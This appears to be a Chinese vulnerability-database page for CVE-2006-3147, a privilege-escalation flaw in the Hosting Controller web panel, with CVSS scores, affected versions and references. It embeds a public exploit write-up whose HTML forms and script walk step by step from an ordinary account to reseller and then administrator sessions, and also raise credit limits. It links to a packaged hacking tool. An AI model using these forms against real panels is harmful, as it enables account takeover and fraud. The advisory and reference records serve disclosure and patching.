CVE-2006-3147
CVSS6.5
发布时间 :2006-06-22 18:06:00
修订时间 :2011-03-07 21:37:57
NMCOE    

[原文]Unspecified vulnerability in Hosting Controller before 6.1 (aka Hotfix 3.2) allows remote authenticated attackers to gain host admin privileges, list all resellers, or change resellers' passwords via unspecified vectors. NOTE: due to the lack of precise details, it is not clear whether this is related to a previously disclosed issue such as CVE-2005-1788.


[CNNVD]Hosting Controller 未明漏洞(CNNVD-200606-452)

        Hosting Controller 6.1 (又称 Hotfix 3.2) 存在未明漏洞。远程认证攻击者可以借助未明向量,获得主机管理权限,列出所有转售商,或者更改转售商的密码。

- CVSS (基础分值)

CVSS分值: 6.5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:hosting_controller:hosting_controller:6.1_hotfix_1.9
cpe:/a:hosting_controller:hosting_controller:6.1_hotfix_2.9
cpe:/a:hosting_controller:hosting_controller:6.1_hotfix_2.8
cpe:/a:hosting_controller:hosting_controller:6.1_hotfix_2.1
cpe:/a:hosting_controller:hosting_controller:6.1_hotfix_2.0
cpe:/a:hosting_controller:hosting_controller:6.1_hotfix_2.3
cpe:/a:hosting_controller:hosting_controller:6.1_hotfix_1.7
cpe:/a:hosting_controller:hosting_controller:6.1
cpe:/a:hosting_controller:hosting_controller:6.1_hotfix_1.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3147
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3147
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-452
(官方数据源) CNNVD

- 其它链接及资源

http://secunia.com/advisories/20743
(VENDOR_ADVISORY)  SECUNIA  20743
http://hostingcontroller.com/english/logs/hotfixlogv61_3_2.html
(PATCH)  CONFIRM  http://hostingcontroller.com/english/logs/hotfixlogv61_3_2.html
http://xforce.iss.net/xforce/xfdb/27340
(UNKNOWN)  XF  hosting-controller-admin-gain-privileges(27340)
http://www.vupen.com/english/advisories/2006/2459
(UNKNOWN)  VUPEN  ADV-2006-2459
http://www.securityfocus.com/bid/18565
(UNKNOWN)  BID  18565
http://www.osvdb.org/26693
(UNKNOWN)  OSVDB  26693
http://securitytracker.com/id?1016444
(UNKNOWN)  SECTRACK  1016444

- 漏洞信息

Hosting Controller 未明漏洞
中危 访问验证错误
2006-06-22 00:00:00 2006-08-16 00:00:00
远程  
        Hosting Controller 6.1 (又称 Hotfix 3.2) 存在未明漏洞。远程认证攻击者可以借助未明向量,获得主机管理权限,列出所有转售商,或者更改转售商的密码。

- 公告与补丁

        暂无数据

- 漏洞信息 (1987)

Hosting Controller <= 6.1 Hotfix 3.1 Privilege Escalation Vulnerability (EDBID:1987)
asp webapps
2006-07-06 Verified
0 Soroush Dalili
N/A [点击下载]
Title: An attacker can gain reseller privileges and after that can gain admin privileges
Version: 6.1 Hotfix <= 3.1
Developer url: www.Hostingcontroller.com
Solution: Update to Hotfix 3.2
Discover date: 2005,Summer
Report date (to hc company): Sat Jun 10, 2006
Publish date (in security forums): Thu July 06, 2006

-------------------------------------------------------------------------------------
===============================================
1- This code give resadmin session to a user:
Bug in "hosting/addreseller.asp", No checker is available.
---------------------------------------------------

<script>
function siteaction(){
n_act= "/hosting/addreseller.asp?htype=3"
window.document.all.frm1.action = window.document.all.siteact.value + n_act
window.document.all.frm1.submit()
}
</script>
<hr><br>
Form1<br>
URL: <input type="text" name=siteact size=70>
<br>
<form name="frm1" method="post" onsubmit="return siteaction()">
<table>
<tr>
<td>reseller</td>
<td><input type="text" name="reseller" value="hcadmin"></td>
</tr>
<tr>
<td>loginname</td>
<td><input type="text" name="loginname" value="hcadmin"></td>
</tr>
<tr>
<td>Password</td>
<td><input type="text" name="Password" value=""></td>
</tr>
<tr>
<td>first_name</td>
<td><input type="text" name="first_name" value=""></td>
</tr>
<tr>
<td>first_name</td>
<td><input type="text" name="first_name" value=""></td>
</tr>
<tr>
<td>last_name</td>
<td><input type="text" name="last_name" value=""></td>
</tr>
<tr>
<td>address</td>
<td><input type="text" name="address" value=""></td>
</tr>
<tr>
<td>city</td>
<td><input type="text" name="city" value=""></td>
</tr>
<tr>
<td>state</td>
<td><input type="text" name="state" value=""></td>
</tr>
<tr>
<td>country</td>
<td><input type="text" name="country" value=""></td>
</tr>
<tr>
<td>email</td>
<td><input type="text" name="email" value=""></td>
</tr>
<tr>
<td>phone</td>
<td><input type="text" name="phone" value=""></td>
</tr>
<tr>
<td>fax</td>
<td><input type="text" name="fax" value=""></td>
</tr>
<tr>
<td>zip</td>
<td><input type="text" name="zip" value=""></td>
</tr>
<tr>
<td>selMonth</td>
<td><input type="text" name="selMonth" value=""></td>
</tr>
<tr>
<td>selYear</td>
<td><input type="text" name="selYear" value=""></td>
</tr>
<tr>
<td>txtcardno</td>
<td><input type="text" name="txtcardno" value=""></td>
</tr>
</table>
<br><input type="submit">
</form>
---------------------------------------------------
===============================================
2- This code list all of resellers then you must change a password of one of them then login by it for next step.
Note: Also by this code, everyone can increase its Credit value then buy every host.
---------------------------------------------------
<form action="http://[URL]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCreditLimit" method="post">
<table>
<tr>
<td>Username:</td>
<td><input type="text" name="UserName" value="hcadmin"></td>
</tr>
<tr>
<td>Description:</td>
<td><input type="text" name="Description" value=""></td>
</tr>
<tr>
<td>FullName:</td>
<td><input type="text" name="FullName" value=""></td>
</tr>
<tr>
<td>AccountDisabled 1,[blank]:</td>
<td><input type="text" name="AccountDisabled" value=""></td>
</tr>
<tr>
<td>UserChangePassword:</td>
<td><input type="text" name="UserChangePassword" value=""></td>
</tr>
<tr>
<td>PassCheck=TRUE,0:</td>
<td><input type="text" name="PassCheck" value="0"></td>
</tr>
<tr>
<td>New Password:</td>
<td><input type="text" name="Pass1" value=""></td>
</tr>
<tr>
<td>DefaultDiscount%:</td>
<td><input type="text" name="DefaultDiscount" value="100"></td>
</tr>
<tr>
<td>CreditLimit:</td>
<td><input type="text" name="CreditLimit" value="99999"></td>
</tr>
</table>
<br><input type="submit">
</form>
<hr><br>
---------------------------------------------------
===============================================
3- Now you must login by a resseler that changed password from last step. now goto userlist, if there is a user that will enough and if no user available, u must make it!
now select it and click Enter to enter by that user. now the bug will be available:
each reseller can gain every user session even "HCADMIN" by bug in "Check_Password.asp"
below code will help you:
---------------------------------------------------
<hr><br>
Form1<br>
<form action="http://[URL]/Admin/Check_Password.asp" method="post">
<table>
<tr>
<td>AdName</td>
<td><input type="text" name="AdName" value="hcadmin"></td>
</tr>
</table>
<br><input type="submit">
</form>
<hr><br>
---------------------------------------------------
===============================================

-------------------------------------------------------------------------------------

Finder: Soroush Dalili (http://www.google.com/search?hl=en&q="soroush+dalili")
Email: Irsdl[47]Yahoo[d07]com
Team: GSG (Grayhatz Security Group) [Grayhatz.net]
Thanks from: 
	Farhad Saaedi (farhadjokers[4t]yahoo[d0t]com)
	Small.Mouse from Shabgard.org  (small.mouse[4t]yahoo[d0t]com)
	Kahkeshan Co. (IT Department) (www.kahkeshan.com)
Related URLs:
	http://hidesys.persiangig.com/other/HC_BUGS_BEFORE3.2.txt (all hc bugs by Irsdl)
	http://hidesys.persiangig.com/other/HC%20Hack%20Prog.rar [password: grayhatz.net] (HC automation hacking program source code by simple VB)

# milw0rm.com [2006-07-06]
		

- 漏洞信息

26693
Hosting Controller Authenticated User Privilege Escalation
Remote / Network Access Authentication Management, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

Hosting Controller contains a flaw that may allow a malicious user to gain access to unauthorized privileges and list all resellers or change their passwords. The issue is triggered when unspecified errors occurs. This flaw may lead to a loss of Confidentiality and Integrity.

- 时间线

2006-06-20 Unknow
2006-06-20 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Hosting Controller has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站